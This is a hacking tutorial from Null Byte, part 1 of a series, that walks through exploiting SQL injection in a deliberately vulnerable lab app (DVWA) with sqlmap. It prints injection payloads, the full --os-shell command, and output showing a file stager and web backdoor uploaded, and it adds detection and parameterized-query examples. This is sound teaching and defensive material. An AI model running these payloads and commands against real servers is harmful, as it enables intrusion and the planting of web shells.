
How to Compromise a Web Server & Upload Files to Check for Privilege Escalation, Part 1 « Null Byte :: WonderHowTo



Information gathering is one of the most important steps in pentesting or hacking, and it can often be more rewarding to run things on the target itself rather than just running scripts against it remotely. Starting from a SQL injection, a hacker can compromise a server and eventually upload and run the "unix-privesc-check" script locally to identify further attack vectors.

SQL Injection Primer

SQL (Structured Query Language) is the language used to issue queries against databases to retrieve and manipulate data. You will often find a database system behind a web application, typically storing inventory, user records, or references of any kind. When you search for an item to buy on a website, the underlying query is sent to the database and the relevant information is returned.

SQL injection occurs when an input field is not properly sanitized, allowing an attacker to inject their own SQL into the query. The consequences range from reading and manipulating data, to destroying it, to issuing operating system commands on the server. (The robust fix is not filtering but parameterized queries, which keep user input out of the SQL parser entirely.) SQL injection is an entire area of information security in its own right, and it can take years to cover everything; fortunately, there is very good material available to get started.

One of the simplest tests to check whether a parameter (in this case an input box) is vulnerable to SQL injection is to submit a single quotation mark. This terminates the string literal in the SQL statement early, and if the input is not handled properly, the database will often return a syntax error. If that happens, you can be fairly sure the parameter is injectable. The reverse is not true: an application that swallows errors can still be injectable, which is why the blind techniques seen later on this page exist.

When we enter a single quote into the text box, we can see that it does indeed return an error:

The error message tells us that the database system in use is MySQL and that this is very likely a working injection point. But just to be sure, because you can never be too careful, we can verify it with the sqlmap tool.
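To make the primer concrete, here is an added example (not code from the original article) that reproduces the DVWA-style lookup against an in-memory SQLite table built for the purpose, probes it with a single quote and with the "OR NOT n=n" boolean-based payload shape that sqlmap uses later on this page, and shows the parameterized version that is immune. The table contents and column names are assumptions, and because SQLite only understands `--` comments (MySQL also accepts `#`), the payloads end in `-- ` instead of `#`.

```python
import sqlite3

# Constructed stand-in for DVWA's users table: schema and rows are assumptions,
# chosen only so the queries below have something to return.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Pablo", "Picasso")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """Builds the statement by string concatenation, the way DVWA's low-security
    SQL Injection page does. Whatever the user typed is parsed as SQL."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_fixed(conn, user_id):
    """Parameterized statement: the value travels separately from the SQL text,
    so a quote or a comment marker inside it is just data."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


def probe(conn, lookup, user_id):
    """The tester's first check: does the input reach the SQL parser?
    Returns ("error", message) when the database rejects the query, which is the
    signal the single-quote test looks for, otherwise ("rows", rows)."""
    try:
        return ("rows", lookup(conn, user_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))


def boolean_blind_diff(conn, lookup):
    """Boolean-based blind inference in miniature: the same injection with a false
    and a true condition yields different result sets. A tester (or sqlmap)
    compares the two responses instead of relying on an error message."""
    false_cond = lookup(conn, "1' OR NOT 1296=1296-- ")  # NOT true  -> only id 1
    true_cond = lookup(conn, "1' OR NOT 1296=1297-- ")   # NOT false -> every row
    return len(false_cond), len(true_cond)


if __name__ == "__main__":
    db = make_db()
    print("normal lookup     :", lookup_vulnerable(db, "1"))
    print("single-quote probe:", probe(db, lookup_vulnerable, "1'"))
    print("blind false/true  :", boolean_blind_diff(db, lookup_vulnerable))
    print("fixed, same probe :", probe(db, lookup_fixed, "1'"))
    print("fixed, payload    :", lookup_fixed(db, "1' OR NOT 1296=1297-- "))
```

Against the vulnerable lookup the lone quote produces a parser error (the fingerprint from the screenshot above), and the false/true pair returns one row versus all three, which is exactly the difference sqlmap measures for its boolean-based blind technique. Against the parameterized lookup both probes return nothing and raise nothing.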

Step 1: Configure Your Vulnerable Web App

To demonstrate, I will use DVWA (Damn Vulnerable Web Application), a deliberately vulnerable web app that ships as part of Metasploitable 2. You can use another test target if you like, in which case you can skip this step. My attacking machine is Kali Linux, which I assume you are running as well.

Before we begin, a few things need to be done to get DVWA ready as a target. First, log in to DVWA with the default credentials, "admin" and "password".

Next, navigate to "DVWA Security" and set the security level to "low" in the drop-down menu. This ensures our attacks work as intended.

Now go to the "Setup" page. Here we can create the database if it does not already exist; if it does, it will simply be reset. Click the "Create / Restore Database" button to do so.

Next, browse to the "SQL Injection" page. This page has a function that queries the database when a user ID is entered and returns some information about that user.

Now we are ready to begin the initial phase of our attack.

Step 2: Recon with Sqlmap

Sqlmap is a tool that automates the process of finding and exploiting SQL injection. It is open source and has a huge number of features. To display the basic help menu in the terminal, use the -h flag.

  sqlmap -h
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.2#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

Usage: python sqlmap [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to define the
    target(s)

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs

  Request:
    These options can be used to specify how to connect to the target URL

    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --random-agent      Use randomly selected HTTP User-Agent header value
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to provided value

  Detection:
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC

  General:
    These options can be used to set some general working parameters

    --batch             Never ask for user input, use the default behavior
    --flush-session     Flush session files for current target

  Miscellaneous:
    --sqlmap-shell      Prompt for an interactive sqlmap shell
    --wizard            Simple wizard interface for beginner users

[!] to see full list of options run with '-hh'

To run this, we need a few pieces of information. First, the URL, which can be found by submitting a valid entry to the app. Here is what is returned for an ID value of 1:

We can see that this works correctly, and now we have the target URL:

  http://172.16.1.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit

Next, we need the cookie information. Open the developer tools in whichever browser you use. In Firefox and Chrome, you can just right-click anywhere on the page and choose "Inspect Element" or "Inspect." Both cookie values matter: DVWA reads the security level from the "security" cookie, and without a valid PHPSESSID the request is redirected to the login page, so sqlmap would end up testing the wrong page.

In Firefox, navigate to the "Network" tab and reload the page. Click on the GET request with status code 200, then under "Headers", scroll down to find the cookie.

Step 3: Upload Files with Sqlmap

Sqlmap includes a useful feature that can reach the underlying operating system the database runs on and execute commands. While this is useful in other scenarios, it also lets us achieve our goal here of uploading a file to the server. It is not magic, though: on MySQL the file write needs a database user with the FILE privilege and a directory that is both writable by the database process and served by the web server (and on newer MySQL releases the secure_file_priv setting can block it outright). DVWA on Metasploitable 2 satisfies all of this.

To get the interactive prompt, simply add the --os-shell option when running sqlmap. It will prompt you with a couple of questions; in this case the default answers will work.

  sqlmap -u "http://172.16.1.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=efc1b1545fd26e619025f0474f9f9a48" --os-shell
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.2#stable}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:51:06 /2019-03-14/

[10:51:06] [INFO] resuming back-end DBMS 'mysql'
[10:51:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1296=1296#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND ROW(1521,3650)>(SELECT COUNT(*),CONCAT(0x7170626271,(SELECT (ELT(1521=1521,1))),0x7178707071,FLOOR(RAND(0)*2))x FROM (SELECT 2413 UNION SELECT 2304 UNION SELECT 5732 UNION SELECT 1948)a GROUP BY x)-- ZXIP&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5)-- kuRu&Submit=Submit
---
[10:51:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[10:51:06] [INFO] going to use a web backdoor for command prompt
[10:51:06] [INFO] fingerprinting the back-end DBMS operating system
[10:51:06] [INFO] heuristics detected web page charset 'ascii'
[10:51:06] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n
[10:52:03] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1

Here the writable directory is chosen, which is what lets us upload files. Since our target runs an Apache web server, /var/www/ will be that directory; it is the first of sqlmap's common locations, so the default works.

Once it finishes, we should see a new prompt that lets us run ordinary operating system commands. But a few lines above it we can see something interesting: a backdoor and a file stager have been uploaded.

  [10:52:24] [WARNING] unable to automatically parse any web server path
[10:52:24] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[10:52:24] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://172.16.1.102:80/tmpuryfm.php
[10:52:25] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://172.16.1.102:80/tmpbjrer.php
[10:52:25] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>

We are interested in uploading files, so all we have to do is browse to the stager URL it gave us. When we do, we are greeted by a file uploader:

Nice. This is exactly where we want to be. Make a note of both filenames, though: sqlmap does not remove the stager or the backdoor when you quit the shell, so they need to be recorded for cleanup and for the report.
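What this attack looks like from the defender's side is worth seeing as well. The following is an added example, not part of the original tutorial, that runs simple detection logic over a constructed Apache combined-format access log. The client address 172.16.1.100, the timestamps and the byte counts are assumptions, and the text of the file-write request is my reconstruction of the method sqlmap named above (LIMIT 'LINES TERMINATED BY'), not output taken from the page. The indicators are the shapes that appeared in sqlmap's own output: a lone quote, the "OR NOT n=n" condition, SLEEP(), INTO OUTFILE, a request for a tmp?????.php file, and the default sqlmap User-Agent (which --random-agent from the help above would hide).

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache combined-format access log. The client address, timestamps
# and byte counts are assumptions; the request paths reuse the payload shapes and
# the stager filename that sqlmap printed in this tutorial.
SAMPLE_LOG = """\
172.16.1.100 - - [14/Mar/2019:10:50:58 -0400] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4212 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
172.16.1.100 - - [14/Mar/2019:10:50:59 -0400] "GET /dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 200 3980 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
172.16.1.100 - - [14/Mar/2019:10:51:06 -0400] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20OR%20NOT%201296%3D1296%23&Submit=Submit HTTP/1.1" 200 4212 "-" "sqlmap/1.3.2#stable (http://sqlmap.org)"
172.16.1.100 - - [14/Mar/2019:10:51:07 -0400] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%20SLEEP%285%29--%20kuRu&Submit=Submit HTTP/1.1" 200 4212 "-" "sqlmap/1.3.2#stable (http://sqlmap.org)"
172.16.1.100 - - [14/Mar/2019:10:52:24 -0400] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27/var/www/tmpuryfm.php%27%20LINES%20TERMINATED%20BY%200x3c3f706870&Submit=Submit HTTP/1.1" 200 3980 "-" "sqlmap/1.3.2#stable (http://sqlmap.org)"
172.16.1.100 - - [14/Mar/2019:10:52:25 -0400] "GET /tmpuryfm.php HTTP/1.1" 200 512 "-" "sqlmap/1.3.2#stable (http://sqlmap.org)"
10.0.0.5 - - [14/Mar/2019:10:53:00 -0400] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4190 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/72.0.3626.121 Safari/537.36"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each indicator is matched against the URL-decoded request path, ordered roughly
# by how far along the attack shown above the client has got.
INDICATORS = [
    # the manual test from the primer: a parameter value ending in a lone quote
    ("sql-quote-probe", re.compile(r"=[^&]*'(?:$|&)")),
    # boolean-based blind: ' OR NOT 1296=1296 / ' AND 1=1 style conditions
    ("boolean-blind", re.compile(r"'\s*(?:OR|AND)\s+(?:NOT\s+)?\d+\s*=\s*\d+", re.I)),
    # time-based blind: MySQL SLEEP() or BENCHMARK()
    ("time-blind", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)|\bBENCHMARK\s*\(", re.I)),
    # a file write through the database, the method sqlmap named for the stager
    ("file-write", re.compile(r"INTO\s+(?:OUT|DUMP)FILE|LINES\s+TERMINATED\s+BY", re.I)),
    # a hit on tmp?????.php, the naming seen for both the stager and the backdoor
    ("stager-access", re.compile(r"^/tmp[a-z]{5}\.php(?:$|\?)", re.I)),
]
SQLMAP_UA = re.compile(r"\bsqlmap\b", re.I)


def parse_line(line):
    """Returns the fields of one combined-log line with the path URL-decoded, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["path"] = unquote_plus(entry["path"])
    return entry


def classify(entry):
    """Names every indicator a single request trips."""
    hits = [name for name, rx in INDICATORS if rx.search(entry["path"])]
    if SQLMAP_UA.search(entry["ua"]):
        hits.append("sqlmap-user-agent")
    return hits


def analyze(log_text):
    """Counts indicators per client; clients that trip nothing are left out."""
    findings = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for name in classify(entry):
            findings[entry["ip"]][name] += 1
    return {ip: dict(counts) for ip, counts in findings.items()}


def likely_webshell(findings):
    """A database file write followed by a request for a tmp?????.php file is the
    shape of a successful stager upload; those clients deserve an incident."""
    return sorted(ip for ip, c in findings.items()
                  if c.get("file-write") and c.get("stager-access"))


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ip, counts in result.items():
        print(ip, counts)
    print("probable web shell drop from:", likely_webshell(result))
```

The point of keeping the indicators separate is triage: a lone quote or an OR NOT condition alone is reconnaissance, while INTO OUTFILE followed by a 200 on a freshly named PHP file means the host already has a shell on it and the response is containment, not tuning. The tmp?????.php pattern is deliberately narrow and only catches sqlmap's default naming, so treat it as a confirmation signal rather than the primary detection.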

Stay Tuned for the Next Part

So far, we have covered the basics of SQL injection and how to identify vulnerable injection points. We then used sqlmap to verify the finding and collect more information about the database and the host. Finally, we used the same tool to place a file stager on the target so that we can upload files.

In the next part of this tutorial, we will use this handy feature to upload and run a script on the server that identifies configuration issues and possible avenues for privilege escalation.

Up Next: How to Compromise a Web Server & Upload Files to Check for Privilege Escalation, Part 2 (Coming Soon)

Cover image by panumas nikhomkhai/Pexels; screenshots by drd_/Null Byte
